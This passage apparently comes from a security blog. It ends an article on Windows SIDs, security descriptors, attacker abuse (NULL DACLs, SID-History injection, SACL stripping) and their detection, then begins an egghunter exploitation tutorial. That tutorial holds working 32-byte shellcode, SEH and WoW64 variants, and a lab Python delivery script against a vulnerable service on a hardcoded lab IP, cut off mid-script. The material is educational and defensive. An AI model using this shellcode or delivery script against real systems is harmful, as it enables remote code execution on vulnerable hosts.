} SECURITY_DESCRIPTOR, *PISECURITY_DESCRIPTOR;

Field by field: Revision is always 1; Sbz1 is reserved and must be zero; Control is a flag bitmask; Owner and Group point to SIDs; Dacl and Sacl point to access-control lists. The internal layout differs between absolute form (the struct holds pointers to separately allocated SIDs and ACLs) and self-relative form (everything packed into one contiguous blob with offsets, marked by SE_SELF_RELATIVE). Because that format varies, never poke fields directly — drive it through the API.

The Control field qualifies how the rest of the descriptor is interpreted:

| Flag | Meaning |
|---|---|
| SE_DACL_PRESENT | The descriptor has a DACL (the pointer may still be NULL) |
| SE_SACL_PRESENT | The descriptor has a SACL |
| SE_DACL_PROTECTED | DACL is shielded from inherited ACEs |
| SE_SACL_PROTECTED | SACL is shielded from inherited ACEs |
| SE_OWNER_DEFAULTED | Owner was assigned by a default mechanism |
| SE_SELF_RELATIVE | Descriptor is in packed, self-relative form |

Here is the single most important gotcha in this entire topic, and it has burned production systems repeatedly. There is a difference between no DACL, an empty DACL, and a NULL DACL:

SECURITY_DESCRIPTOR sd;
InitializeSecurityDescriptor(&sd, SECURITY_DESCRIPTOR_REVISION);

// NULL DACL: present == TRUE, pointer == NULL  -> GRANTS EVERYONE FULL ACCESS
SetSecurityDescriptorDacl(&sd, TRUE, NULL, FALSE);

// Empty DACL: present == TRUE, non-NULL ACL with zero ACEs -> DENIES EVERYONE
// (initialize an ACL with InitializeAcl and add no ACEs, then pass it here)

If SE_DACL_PRESENT is not set, or it is set with a NULL DACL pointer, the object allows full access to everyone. Developers reach for SetSecurityDescriptorDacl(&sd, TRUE, NULL, FALSE) thinking “no restrictions, default behavior” and ship a world-writable named pipe or service. An empty DACL — present, non-NULL, zero ACEs — does the opposite and denies everyone. One null pointer is the difference.


Hierarchy diagram of the SECURITY_DESCRIPTOR structure showing Owner SID, Group SID, DACL containing allow and deny ACEs, and SACL containing audit ACEs as child nodes
A security descriptor owns four pointers: two SIDs declaring ownership, a DACL controlling access, and a SACL controlling auditing — each ACE carries its own SID and access mask.

6. DACLs and ACEs: How Access Is Decided

A DACL is an ordered list of Access Control Entries. Each ACE has an ACE_HEADER (AceType, AceFlags, AceSize), an ACCESS_MASK of rights, and a trailing SID the entry applies to.

| ACE Type | Used In | Effect |
|---|---|---|
| ACCESS_ALLOWED_ACE | DACL | Grants rights in its mask to the SID |
| ACCESS_DENIED_ACE | DACL | Denies rights in its mask to the SID |
| SYSTEM_AUDIT_ACE | SACL | Logs access matching its mask |

Evaluation order matters: the kernel walks ACEs top to bottom and stops as soon as the requested access is fully granted or any of it is denied. Well-formed (canonical) DACLs place deny ACEs ahead of allow ACEs precisely so a deny is seen first. An ACL has no hard ACE-count limit, but the whole ACL must stay under 64 KB.
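
The walk described above, together with the NULL-versus-empty DACL distinction from the previous section, fits in one short function. This is a simplified portable C model, not SeAccessCheck: AceModel, DaclModel, and dacl_check are hypothetical names, SIDs are compared as strings, and the model ignores integrity levels, privileges, owner rights, and inherit-only ACEs.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

typedef enum { ACE_ALLOW, ACE_DENY } AceKind;

typedef struct {
    AceKind     kind;
    uint32_t    mask;   /* rights this ACE grants or denies */
    const char *sid;    /* string SID the ACE applies to    */
} AceModel;

typedef struct {
    bool            present;  /* models SE_DACL_PRESENT           */
    const AceModel *aces;     /* NULL models a NULL DACL          */
    size_t          count;    /* 0 with non-NULL aces: empty DACL */
} DaclModel;

static bool token_has_sid(const char *const *sids, size_t n, const char *sid) {
    for (size_t i = 0; i < n; i++)
        if (strcmp(sids[i], sid) == 0) return true;
    return false;
}

/* Returns true only if every bit in `desired` ends up granted. */
bool dacl_check(const DaclModel *d, const char *const *token_sids, size_t n,
                uint32_t desired) {
    if (!d->present || d->aces == NULL) return true;  /* no DACL or NULL DACL */
    uint32_t remaining = desired;
    for (size_t i = 0; i < d->count && remaining; i++) {
        const AceModel *a = &d->aces[i];
        if (!token_has_sid(token_sids, n, a->sid)) continue;
        if (a->kind == ACE_DENY) {
            if (a->mask & remaining) return false;    /* a still-needed right is denied */
        } else {
            remaining &= ~a->mask;                    /* these rights are now granted */
        }
    }
    return remaining == 0;   /* an empty DACL lands here with nothing granted */
}
```

Running the same two ACEs in canonical order (deny first) and in reversed order shows why ordering matters: with the allow ACE first, the walk stops as soon as the request is satisfied and the deny entry is never reached.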

Reading a real object’s DACL means pulling the descriptor and iterating ACEs by index with GetAce:

// Requires <windows.h> and <aclapi.h>; link with advapi32.
PSECURITY_DESCRIPTOR pSD = NULL;
PSID  pOwner = NULL;
PACL  pDacl  = NULL;

DWORD rc = GetNamedSecurityInfoW(
    L"C:\\Windows\\System32\\config\\SAM", SE_FILE_OBJECT,
    OWNER_SECURITY_INFORMATION | DACL_SECURITY_INFORMATION,
    &pOwner, NULL, &pDacl, NULL, &pSD);

if (rc == ERROR_SUCCESS) {
    // pDacl is NULL for a NULL DACL; pOwner and pDacl point into pSD.
    for (WORD i = 0; pDacl && i < pDacl->AceCount; i++) {
        PACE_HEADER hdr = NULL;
        if (GetAce(pDacl, i, (LPVOID*)&hdr)) {
            // hdr->AceType  == ACCESS_ALLOWED_ACE_TYPE / ACCESS_DENIED_ACE_TYPE
            // hdr->AceFlags == CONTAINER_INHERIT_ACE | OBJECT_INHERIT_ACE | ...
        }
    }
    LocalFree(pSD);   // always free the descriptor, even when there is no DACL
}

7. SACLs: Auditing Through the System ACL

The SACL uses the same ACL container but holds SYSTEM_AUDIT_ACE entries instead. Its access mask doesn’t grant or deny anything — it defines which access attempts generate audit records in the Windows Security Event Log. Reading or writing any object’s SACL requires the SeSecurityPrivilege right, which only Administrators normally hold. That privilege boundary is exactly why SACL tampering is a high-value detection target: the act of stripping audit ACEs is itself privileged.


8. SDDL: Security Descriptors as Text

A binary descriptor is awful to log, diff, or paste into a config file, so Windows defines the Security Descriptor Definition Language — a string form. The grammar is O: owner, G: group, D: DACL, S: SACL, each followed by flags and parenthesized ACEs:

O:BAG:SYD:(A;;FA;;;SY)(A;;FA;;;BA)(A;;0x1200a9;;;BU)S:(AU;SAFA;FA;;;WD)

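Read left to right, the owner is BA (Builtin Administrators) and the group is SY (SYSTEM). The first DACL entry, (A;;FA;;;SY), reads as: Allow, no inherit flags, File All access, to SY. The third, (A;;0x1200a9;;;BU), grants Builtin Users a raw hex mask that works out to read and execute. Round-trip a descriptor with ConvertSecurityDescriptorToStringSecurityDescriptor and ConvertStringSecurityDescriptorToSecurityDescriptor. In practice you’ll read SDDL far more often through PowerShell: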

$acl = Get-Acl C:\Windows\System32\config\SAM
$acl.Owner            # owner principal
$acl.Sddl             # full SDDL string
$acl.Access | Format-Table IdentityReference, FileSystemRights, AccessControlType

icacls <path> gives the same data in a terser shorthand; Get-Acl is friendlier when you want the SDDL string itself for a baseline diff.
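
When you diff SDDL baselines in your own tooling, the first step is usually splitting each parenthesized ACE into its semicolon-separated fields. Here is a minimal portable C sketch of that split, assuming the common six-field form (type; flags; rights; object GUID; inherited object GUID; trustee). SddlAce and parse_sddl_ace are hypothetical names, and conditional or resource-attribute ACEs, which carry a seventh field, are rejected rather than handled.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

#define SDDL_FIELD_MAX 192

typedef struct {
    char type[SDDL_FIELD_MAX];          /* A, D, AU, ...            */
    char flags[SDDL_FIELD_MAX];         /* e.g. CI, OI, SAFA        */
    char rights[SDDL_FIELD_MAX];        /* e.g. FA or a hex mask    */
    char object_guid[SDDL_FIELD_MAX];
    char inherit_guid[SDDL_FIELD_MAX];
    char trustee[SDDL_FIELD_MAX];       /* alias (SY) or string SID */
} SddlAce;

/* Splits "(type;flags;rights;guid;guid;trustee)". Returns 0 on success. */
int parse_sddl_ace(const char *ace, SddlAce *out) {
    size_t len = strlen(ace);
    if (len < 2 || ace[0] != '(' || ace[len - 1] != ')') return -1;

    char *fields[6] = { out->type, out->flags, out->rights,
                        out->object_guid, out->inherit_guid, out->trustee };
    const char *p = ace + 1;
    const char *stop = ace + len - 1;              /* points at ')' */

    for (int i = 0; i < 6; i++) {
        const char *sep = memchr(p, ';', (size_t)(stop - p));
        const char *end = (i < 5) ? sep : stop;
        if (end == NULL) return -1;                /* fewer than six fields   */
        if (i == 5 && sep != NULL) return -1;      /* seventh field: rejected */
        size_t n = (size_t)(end - p);
        if (n >= SDDL_FIELD_MAX) return -1;
        memcpy(fields[i], p, n);
        fields[i][n] = '\0';
        p = end + 1;
    }
    return 0;
}
```

Feeding it (AU;SAFA;FA;;;WD) from the example string yields type AU, flags SAFA, rights FA, and trustee WD, with both GUID fields empty. Comparing the parsed fields instead of the raw strings makes a baseline diff tolerant of ACE reordering.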


9. Inheritance and the Kernel Check

Child objects don’t usually carry hand-written ACLs. They inherit them. An ACE’s flags decide propagation: OBJECT_INHERIT_ACE (OI) pushes it onto leaf objects like files, CONTAINER_INHERIT_ACE (CI) onto sub-containers like folders or registry subkeys, and INHERIT_ONLY_ACE (IO) makes an ACE apply only to children and not the object carrying it. SE_DACL_PROTECTED blocks inheritance entirely — that’s what “disable inheritance” does in Explorer.

The decision itself happens in the kernel. Each OBJECT_HEADER carries a SecurityDescriptor field. At handle-creation time the Object Manager hands the token, the requested access, and the descriptor to the Security Reference Monitor (nt!SeAccessCheck), which walks the DACL and returns a granted-access mask. You can see the whole chain live in WinDbg:

kd> !process 0 0 lsass.exe
kd> !object <Object address>
kd> dt nt!_OBJECT_HEADER <header address> SecurityDescriptor
kd> !sd <SecurityDescriptor address & ~0xf>   ; mask low bits, they're flags
kd> !token                                     ; the token the check runs against

Files, registry keys, processes, threads, named pipes, services, jobs — anything named and securable runs through this same path.


10. Common Attacker Techniques

SIDs and SDs aren’t just plumbing — they’re a manipulation target for evasion and escalation. The primitives below all leave traces (covered next), which is the point of teaching them.

| Technique | Description |
|---|---|
| NULL DACL planting | Set a present-but-NULL DACL on a service, registry key, or pipe to make it world-writable |
| DACL tampering for persistence | Add an explicit ACCESS_ALLOWED_ACE granting the attacker’s SID FullControl on a sensitive object |
| Owner abuse | Taking ownership of an object implicitly grants WRITE_DAC, letting an attacker rewrite the DACL afterward |
| SID-History injection | Write a privileged SID (e.g. a Domain Admins RID) into a controlled account’s sIDHistory so it lands in the token |
| SACL stripping | Remove audit ACEs from lsass.exe, SAM, or ntds.dit to suppress access logging before credential theft |
| Permission group discovery | Enumerate group SIDs and ACL members to plan lateral movement |

A populated sIDHistory on a non-migrated account is the canonical hunting signal for the injection case:

Get-ADUser -Filter * -Properties sIDHistory |
    Where-Object { $_.sIDHistory } |
    Select-Object Name, @{ n='sIDHistory'; e={ $_.sIDHistory -join ', ' } }

In a domain with no active migration, any result here deserves investigation — especially a sIDHistory value ending in RID 512 or 519.
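
If the sIDHistory values are exported as strings, the RID triage can be automated with a few lines of code. The sketch below is portable C and purely illustrative: sid_string_rid and sid_history_is_privileged are hypothetical helper names, the check covers only the two RIDs named above (512 and 519), and a real hunt would likely extend the list.

```c
#include <assert.h>
#include <stdbool.h>
#include <stdlib.h>
#include <string.h>

/* Returns the trailing RID of a string SID, or -1 if it cannot be read. */
long long sid_string_rid(const char *sid) {
    const char *dash = strrchr(sid, '-');
    char *end;
    if (dash == NULL || dash[1] < '0' || dash[1] > '9') return -1;
    unsigned long long rid = strtoull(dash + 1, &end, 10);
    if (*end != '\0' || rid > 0xFFFFFFFFULL) return -1;
    return (long long)rid;
}

/* Domain SIDs start with S-1-5-21-; builtin and service SIDs do not. */
static bool is_domain_sid(const char *sid) {
    return strncmp(sid, "S-1-5-21-", 9) == 0;
}

/* Flags sIDHistory entries that end in Domain Admins (512) or
   Enterprise Admins (519). */
bool sid_history_is_privileged(const char *sid) {
    if (!is_domain_sid(sid)) return false;
    long long rid = sid_string_rid(sid);
    return rid == 512 || rid == 519;
}
```

An entry such as S-1-5-21-1004336348-1177238915-682003330-512 (example domain values) is flagged, while an ordinary user RID like 1105 on the same domain is not. Treat a hit as a reason to investigate, not as proof of compromise, since a genuine migration can leave such values behind.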


Graph diagram mapping four attacker techniques — SID-History Injection, NULL DACL Planting, DACL Tampering, and SACL Stripping — to their respective impacts: privileged token, world-writable object, persistent access, and audit blindspot
Each abuse primitive targets a distinct part of the SID/security-descriptor model and produces a different attacker capability, from silent credential theft to persistent object access.

11. Detection, Hunting, and Hardening

DACL and SACL changes are logged by Windows itself, not Sysmon — you must enable the right Advanced Audit Policy subcategories first (Object Access → Audit File System / Audit Registry, and Policy Change → Audit Audit Policy Change).

| Event ID | Trigger | Hunt On |
| --- | --- | --- |
| 4670 | Object permissions changed (DACL/Owner) | ObjectName, OldSd, NewSd, SubjectUserSid |
| 4907 | Object auditing (SACL) settings changed | Blank NewSd = SACL stripped |
| 4715 | Audit policy on an object changed | OriginalSecurityDescriptor, NewSecurityDescriptor |
| 4719 | System audit policy changed | SubjectUserSid, AuditPolicyChanges |
| 4663 | Object access attempt | Sudden gaps after a 4907 on LSASS = stripping |
| 4728/4732/4756 | Member added to privileged group | Correlate with SID manipulation |

The highest-fidelity signal is a 4907 that blanks the SACL on lsass.exe, ntds.dit, or the SAM hive — that’s pre-credential-dump preparation. Pair it with Sysmon Event ID 10 (process access to LSASS) and Event ID 1 watching for icacls.exe, cacls.exe, sc.exe sdset, and Set-Acl command lines. A Sigma sketch for DACL tampering on sensitive objects:

title: Suspicious DACL Modification on Sensitive Object
logsource:
  product: windows
  service: security
detection:
  selection:
    EventID: 4670
    ObjectName|contains:
      - '\lsass.exe'
      - '\ntds.dit'
      - '\SAM'
  condition: selection
fields:
  - SubjectUserSid
  - ObjectName
  - OldSd
  - NewSd
level: high
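
For the 4907 case, the "blank NewSd" test can be approximated by counting ACEs in the SACL portion of the SDDL strings. This is a rough Python sketch, not a full SDDL parser: it assumes the OldSd/NewSd fields have already been extracted as strings, treats everything after the first `S:` marker as the SACL, and the function names are hypothetical.

```python
import re

def sacl_ace_count(sddl: str) -> int:
    """Count parenthesised ACEs after the 'S:' (SACL) marker; 0 if absent or empty."""
    # SIDs are written 'S-1-...', so 'S:' is assumed to appear only as the SACL marker.
    idx = sddl.find("S:")
    if idx == -1:
        return 0
    return len(re.findall(r"\([^)]*\)", sddl[idx + 2:]))

def sacl_stripped(old_sd: str, new_sd: str) -> bool:
    """True when the old descriptor had audit ACEs and the new one has none."""
    return sacl_ace_count(old_sd) > 0 and sacl_ace_count(new_sd) == 0

print(sacl_stripped("S:AI(AU;SAFA;FA;;;WD)", "S:"))
```

A hit from `sacl_stripped` on lsass.exe, ntds.dit, or the SAM hive is the pattern the paragraph above calls pre-credential-dump preparation.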

Hardening, in rough priority order:

  • Hunt NULL DACLs. Use AccessChk to enumerate world-writable services, keys, and files; fix them.
  • Protect the LSASS SACL and alert on any 4907 that empties it.
  • Enable SID Filtering on every trust to neutralize cross-domain sIDHistory abuse, and audit sIDHistory on a schedule.
  • Restrict SeSecurityPrivilege to Administrators and watch for its use.
  • Prefer explicit DENY over absent ALLOW, and put privileged accounts in Protected Users.

MITRE ATT&CK Mapping

| Technique | MITRE ID | Detection |
| --- | --- | --- |
| Access Token Manipulation | T1134 | Token/SID anomalies in logon events |
| SID-History Injection | T1134.005 | Non-empty sIDHistory on non-migrated accounts |
| File/Directory Permissions Modification | T1222.001 | 4670; icacls/SetNamedSecurityInfo in 4688 |
| Impair Defenses: Disable/Modify Tools | T1562.001 | 4907 blanking a SACL; 4663 gaps |
| Permission Groups Discovery | T1069.001 / .002 | Bulk SID/group enumeration |

12. Tools

| Tool | Description | Link |
| --- | --- | --- |
| AccessChk | Dumps effective permissions and finds NULL/weak DACLs | learn.microsoft.com |
| icacls | Built-in ACL viewer/editor with SDDL shorthand | (built-in) |
| Get-Acl / Set-Acl | PowerShell SD read/write, exposes .Sddl | (built-in) |
| WinDbg | Kernel-side !sd, !token, OBJECT_HEADER inspection | learn.microsoft.com |
| Process Hacker | GUI view of token SIDs and object security | processhacker.sourceforge.io |
| WinObj | Browse Object Manager namespace and per-object security | learn.microsoft.com |

Summary

  • A SID is the immutable, never-reused name Windows checks for every authorization decision — display names are cosmetic, SIDs are ground truth.
  • The access token carries the user SID plus all group SIDs (including any from sIDHistory), and the kernel compares those against an object’s DACL via nt!SeAccessCheck.
  • The SECURITY_DESCRIPTOR binds owner, group, DACL, and SACL; a present-but-NULL DACL silently grants everyone full access, while an empty DACL denies everyone.
  • SID-History injection (T1134.005) and SACL stripping (T1562.001) are the two abuse primitives worth hunting hardest — watch 4670, 4907, and non-empty sIDHistory.
  • Enable Object Access and Policy Change auditing, restrict SeSecurityPrivilege, enable SID Filtering on trusts, and baseline SDDL on sensitive objects so a tampered DACL stands out.

Egghunters: Staged Payload Delivery When Buffer Space Is Tight

You’ve overwritten the SEH chain. The POP POP RET gadget drops you into a clean four-byte landing zone, the short jump carries you forward — and you count maybe 60 usable bytes before the buffer turns to garbage. Your stager is 350. That gap, between the space you control and the space your payload needs, is the entire reason egghunters exist.

An egghunter is a tiny piece of shellcode — roughly 32 bytes in its tightest form — whose only job is to walk the process’s virtual address space looking for a marker, then hand execution to whatever sits immediately after that marker. The real payload gets parked somewhere else in memory: a different request field, an HTTP header, the heap. Two stages, loosely coupled. The hunter is small enough to fit in the cramped overflow; the payload can be as large as you like, as long as it’s already resident when the hunter runs.

I’ll walk the mechanism, the two classic Windows implementations, the WoW64 wrinkle on modern Windows, and — because this is a defender’s site first — exactly how the technique lights up your telemetry.


1. Why Egghunters Exist

The technique traces back to Matt Miller (skape) and his survey of “safely searching process virtual address space.” The core insight: you can’t just dereference arbitrary addresses looking for your tag, because most of the address range is unmapped. Touch an unmapped page and you take an access violation, which by default kills the process. So the hunter needs a way to test a page for readability before it reads it.

The layout in memory looks like this:

  small overflow buffer (~32-60B)        elsewhere in the process
  +---------------------------+          +-----------------------------+
  | EGGHUNTER (the "hunter")  | --scan-> | w00tw00t + full shellcode   |
  +---------------------------+          +-----------------------------+
                                  finds the doubled tag, jmp to payload

Two preconditions, both non-negotiable:

  • At least ~32 reachable bytes to hold the hunter itself.
  • The full payload must already be in memory when the hunter executes.

That second one bites people. If the payload isn’t resident yet, the hunter scans forever and pegs one CPU core at 100%. The first time I ran a KSTET egghunter I watched the target lock a core and assumed my opcode bytes were wrong. They weren’t — I’d sent the egg-tagged payload after the trigger instead of before, so there was nothing in memory to find. The hunter was working perfectly. It just had nothing to land on.


2. The Page-Walk Problem

x86 virtual memory is paged in 4 KB (0x1000) chunks. A page is either mapped (readable, possibly more) or unmapped (touching it faults). The egghunter exploits this granularity to scan efficiently and safely.

The trick is OR DX, 0x0FFF. That instruction forces the low 12 bits of the iterator register to all-ones, snapping EDX to the last byte of the current page. A following INC EDX rolls it over to the first byte of the next page. So when a page turns out to be invalid, the hunter doesn’t crawl byte-by-byte through 4096 bad addresses — it jumps straight to the next page boundary and probes again. Inside a valid page it advances one DWORD at a time looking for the tag.
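
The page-snap arithmetic is easy to check outside a debugger. Here is a small Python model of the two instructions, assuming a 32-bit register; `next_page` is an illustrative name, not part of any tool.

```python
PAGE_MASK = 0x0FFF  # low 12 bits select the byte within a 4 KB page

def next_page(edx: int) -> int:
    """Model `or dx, 0x0fff` followed by `inc edx` on a 32-bit register."""
    last_byte_of_page = edx | PAGE_MASK           # or dx, 0x0fff
    return (last_byte_of_page + 1) & 0xFFFFFFFF   # inc edx (wraps at 4 GB)

print(hex(next_page(0x00401234)))   # 0x402000
```

Whatever offset the scan pointer holds inside a bad page, one OR plus one INC lands it on the first byte of the following page.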

The brief table of moving parts:

| Component | Detail |
| --- | --- |
| Memory iterator register | EDX holds the current scan address |
| Page-boundary jump | OR DX, 0x0FFF → end of page; INC EDX → start of next page |
| Validity probe | A syscall (or an SEH frame) tests whether the page is readable |
| Egg comparison | SCASD compares EAX to [EDI] and auto-increments EDI |
| Transfer to payload | JMP EDI once both halves of the egg match |

Flowchart showing the egghunter page-walk loop: snapping EDX to page boundaries with OR DX 0x0FFF, probing validity via INT 0x2E, skipping on access violation, scanning with SCASD, and jumping to payload on egg match.
The egghunter skips entire 4 KB pages on access violations rather than crawling byte-by-byte, keeping scan time tractable across the full virtual address space.

3. Anatomy of the Syscall Egghunter

The canonical 32-byte hunter uses the kernel as a page-validity oracle. It invokes NtAccessCheckAndAuditAlarm via the legacy INT 0x2E syscall gate and inspects the return: STATUS_ACCESS_VIOLATION (0xC0000005) means the page is bad, so skip it.

; --- 32-byte syscall egghunter (skape), egg = "w00t" ---
loop_inc_page:
    or   dx, 0x0fff        ; EDX -> last byte of current 4KB page
loop_inc_one:
    inc  edx               ; advance one byte (rolls into next page)
loop_check:
    push edx               ; save scan pointer (clobbered by syscall)
    push 0x2               ; NtAccessCheckAndAuditAlarm syscall # (x86, XP-7)
    pop  eax               ;   -> EAX = 0x2   *** verify per OS, see j00ru ***
    int  0x2e              ; legacy syscall gate
    cmp  al, 0x05          ; low byte of STATUS_ACCESS_VIOLATION (0xC0000005)?
    pop  edx               ; restore scan pointer
    je   loop_inc_page     ; bad page -> skip to next page boundary
is_egg:
    mov  eax, 0x74303077   ; "w00t"
    mov  edi, edx          ; EDI = current address
    scasd                  ; compare [EDI] to EAX, EDI += 4
    jnz  loop_inc_one      ; first half mismatch -> keep scanning
    scasd                  ; compare the *second* half of the egg
    jnz  loop_inc_one
matched:
    jmp  edi               ; EDI now points just past the doubled tag

Two SCASD instructions back to back are doing something specific: the tag is the 4-byte value repeated twice (eight bytes total). Requiring both halves to match makes a false positive vanishingly unlikely, and because SCASD auto-advances EDI, after the second success EDI already points at the byte after the egg — exactly where the payload begins. Skape’s IsBadReadPtr-based variant runs 37 bytes; an NtDisplayString variant is also 32 bytes and works identically — only the syscall number differs.
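
The value of the doubled tag shows up clearly in a flat-buffer model of the compare step. The sketch below is a simplification that ignores paging and the syscall probe: it runs the two SCASD checks over a byte string that contains the hunter itself (which embeds the tag once, as the immediate of `mov eax`) followed by an egg-tagged payload. `find_payload` and the memory layout are illustrative assumptions.

```python
# The 32 hunter bytes from the listing above; they contain "w00t" exactly once.
HUNTER = bytes.fromhex(
    "6681caff0f42526a0258cd2e3c055a74"
    "efb8773030748bfaaf75eaaf75e7ffe7"
)

def find_payload(memory: bytes, tag: bytes = b"w00t"):
    """Return the offset just past the first doubled tag, or None if absent."""
    for addr in range(len(memory) - 7):
        edi = addr
        if memory[edi:edi + 4] != tag:   # first scasd fails -> keep scanning
            continue
        edi += 4
        if memory[edi:edi + 4] != tag:   # second scasd fails -> keep scanning
            continue
        return edi + 4                   # where `jmp edi` would land
    return None

memory = HUNTER + b"\x00" * 10 + b"w00tw00t" + b"\xcc"
print(find_payload(memory))              # 50, the offset of the 0xCC byte
```

The single copy of the tag inside the hunter passes the first compare and fails the second, so the scan moves on instead of jumping into its own code.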

| Identifier | Value / Note |
| --- | --- |
| Syscall | NtAccessCheckAndAuditAlarm |
| Syscall number (x86 XP–7) | 0x02 |
| Invocation | INT 0x2E |
| Access-violation status | 0xC0000005 → CMP AL, 0x05 |
| Invalid-page action | JE loop_inc_page |
| Size | ~32 bytes |

Syscall numbers are OS-version specific. 0x02 is stable on XP/Vista/7; Windows 10 moved the table and changed the argument layout. Always confirm against Mateusz “j00ru” Jurczyk’s table at j00ru.vexillium.org/syscalls/nt/64/ for your exact target build.


4. The SEH-Based Variant

Rather than ask the kernel whether a page is valid, this approach installs a temporary Structured Exception Handler, reads memory blindly, and lets faults route into the handler — which simply advances the pointer and resumes. It runs around 60 bytes, but it carries no hardcoded syscall number, so it survives OS version drift better than the syscall hunter.

; --- SEH-based egghunter (illustrative, ~60 bytes) ---
; Register a handler so a read fault resumes scanning instead of crashing.
    push handler            ; EXCEPTION_REGISTRATION_RECORD.Handler
    push dword [fs:0]        ; .Next = current head of the SEH chain
    mov  [fs:0], esp         ; install our frame as the new chain head

    xor  edx, edx            ; scan pointer
scan_loop:
    inc  edx
    mov  edi, edx
    mov  eax, 0x74303077     ; "w00t"
    scasd                    ; read [EDI]; faults route into 'handler'
    jnz  scan_loop
    scasd                    ; confirm second half of the egg
    jnz  scan_loop
    pop  dword [fs:0]        ; restore previous SEH frame
    add  esp, 4
    jmp  edi                 ; transfer to payload
handler:                     ; entered on STATUS_ACCESS_VIOLATION
    ; bump saved EDX in the CONTEXT past the bad page,
    ; return ExceptionContinueExecution, resume scan_loop
    ret

| Feature | Syscall variant | SEH variant |
| --- | --- | --- |
| Size | ~32 bytes | ~60 bytes |
| Validity check | INT 0x2E → NtAccessCheckAndAuditAlarm | Custom FS:[0] handler |
| OS portability | Fragile (syscall # changes) | More portable |
| Detection surface | INT 0x2E is glaring | Quieter, but installs an SEH frame |

That detection-surface row matters from both chairs. The SEH hunter gets recommended as the “portable” choice, and it is — but the syscall hunter’s INT 0x2E is so unused by legitimate user-mode code that flagging it is nearly a free win for the blue team.


Hierarchy diagram comparing the two classic egghunter variants: the 32-byte syscall hunter using INT 0x2E with OS-specific syscall numbers versus the 60-byte SEH hunter using a custom FS:[0] fault handler with better portability.
The syscall hunter wins on size but loses on portability; the SEH hunter avoids hardcoded syscall numbers at the cost of roughly double the byte footprint and its own SEH-frame detection surface.

5. Egg Tags and Bad Characters

The tag is a 4-byte value written twice. Common choices: w00tw00t (0x74303077), T00WT00W, b33fb33f, c0d3c0d3, ERCDERCD. Two independent constraints govern selection.

First, every byte of the hunter and the tag must avoid the vulnerable function’s bad characters. \x00, \x0A, and \x0D are the usual suspects for string-based bugs, but the set is target-specific. Profile it before you commit to a tag.

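Second, and easy to forget: the doubled tag must be unique in process memory ahead of the payload. If the full 8-byte sequence appears anywhere before your real payload, including elsewhere in your own crafted buffer, the hunter jumps there first and executes garbage. A lone 4-byte copy cannot trigger the jump, because both SCASD comparisons must match (the hunter itself embeds one copy), but an earlier stray copy is still worth flagging. Scan your buffer before sending: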

def egg_is_unique(buffer: bytes, tag: bytes) -> bool:
    payload_at = buffer.find(tag * 2)     # the real, doubled egg
    if payload_at == -1:                  # no doubled egg at all: nothing to find
        print(f"[!] doubled tag {tag * 2!r} is missing from the buffer")
        return False
    earlier = buffer.find(tag)            # first single hit (never -1 here)
    if earlier < payload_at:
        print(f"[!] tag {tag!r} appears at offset {earlier} "
              f"before the payload at {payload_at}")
        return False
    return True

The bad-character hunt itself is methodology, not a payload: send a known byte sequence, then diff the receiving buffer in the debugger against what you sent.

# Bad-character probe — compare against the in-memory dump in x64dbg/Immunity
allchars = bytes(range(1, 256))           # skip \x00 explicitly, test the rest
probe = b"A" * 66 + b"B" * 4 + allchars
# Any byte that is mangled, truncated, or terminates the string is "bad".

6. WoW64 and Windows 10

Run a 32-bit egghunter on 64-bit Windows 10 and the old PoCs frequently misfire — the syscall table and ABI underneath WoW64 aren’t what the XP-era hunter expects. The working approach (Corelan published a tested version) uses Heaven’s Gate: transitioning a WoW64 thread from 32-bit to 64-bit mode to issue the real syscall.

The CS segment selector reveals the mode: 0x23 for 32-bit code under WoW64, 0x33 for 64-bit. The hunter checks it, then calls through the pointer stored at FS:[0xC0], the WoW64 transition stub that performs the far jump into 64-bit code.

; --- WoW64 / Heaven's Gate egghunter (conceptual fragment) ---
    mov  ebx, cs            ; read code-segment selector
    cmp  bl, 0x23           ; 0x23 = 32-bit (WoW64) execution?
    ; ... stage 64-bit syscall args ...
    mov  bl, 0xc0
    call dword [fs:ebx]     ; far call via FS:[0xC0] -> 64-bit mode
    cmp  al, 0x05           ; STATUS_ACCESS_VIOLATION low byte
    je   loop_inc_page

The Exploit-DB WoW64 sample (45293) pushes 0x29 as the NtAccessCheckAndAuditAlarm number on a particular Windows 10 x64 build. Don’t copy that number blindly — verify it against j00ru’s table for your build, because it’s exactly the field that breaks between releases.


7. Wiring It Into an SEH Overflow

A typical delivery rides a standard SEH overwrite: nSEH gets a short jump forward, SEH gets a POP/POP/RET gadget that returns into nSEH, the short jump skips over the SEH record, and the hunter runs from there.
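
The nSEH short jump is plain offset arithmetic: `EB rel8` is two bytes long and its displacement counts from the end of the instruction. The Python sketch below uses made-up helper names and treats nSEH as offset 0 of the 8-byte SEH record.

```python
import struct

def short_jmp(rel8: int) -> bytes:
    """Encode x86 `jmp short`: opcode EB plus a signed 8-bit displacement."""
    return b"\xeb" + struct.pack("b", rel8)

def landing_offset(insn_offset: int, rel8: int) -> int:
    """Displacement is relative to the byte after the 2-byte instruction."""
    return insn_offset + 2 + rel8

nseh = short_jmp(6) + b"\x90\x90"        # pad the 4-byte nSEH field with NOPs
print(nseh.hex(), landing_offset(0, 6))  # eb069090 8
```

Landing at offset 8 means execution clears the four nSEH bytes and the four SEH bytes and arrives at the first byte of the hunter.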

[ PADDING ][ nSEH: \xEB\x06\x90\x90 ][ SEH: pop/pop/ret addr ][ egghunter ]
   ... and the egg-tagged full payload lives in a SEPARATE field/request ...

#!/usr/bin/env python3
# LAB ONLY — staged egghunter delivery skeleton (offsets/gadget are placeholders)
import socket
RHOST, RPORT = "192.168.56.20", 9999

egghunter = (                       # 32-byte syscall hunter, tag "w00t"
    b"\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
    b"\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
)
nseh = b"\xeb\x06\x90\x90"           # jmp +6 over the SEH record
seh  = b"\x42\x42\x42\x42"           # PLACEHOLDER pop/pop/ret (find per target)
egg  = b"w00tw00t"                   # tag, doubled
payload = egg + b"\x90" * 16 + b"\xcc"   # \xcc = test int3; swap for calc.exe popup in lab

trigger  = b"A" * 66 + nseh + seh + egghunter
trigger += b"C" * (1000 - len(trigger))

with socket.create_connection((RHOST, RPORT)) as s:
    s.recv(1024)                               # read the server banner
    s.sendall(b"KSTET " + payload + b"\r\n")   # 1) stage the egg-tagged payload first
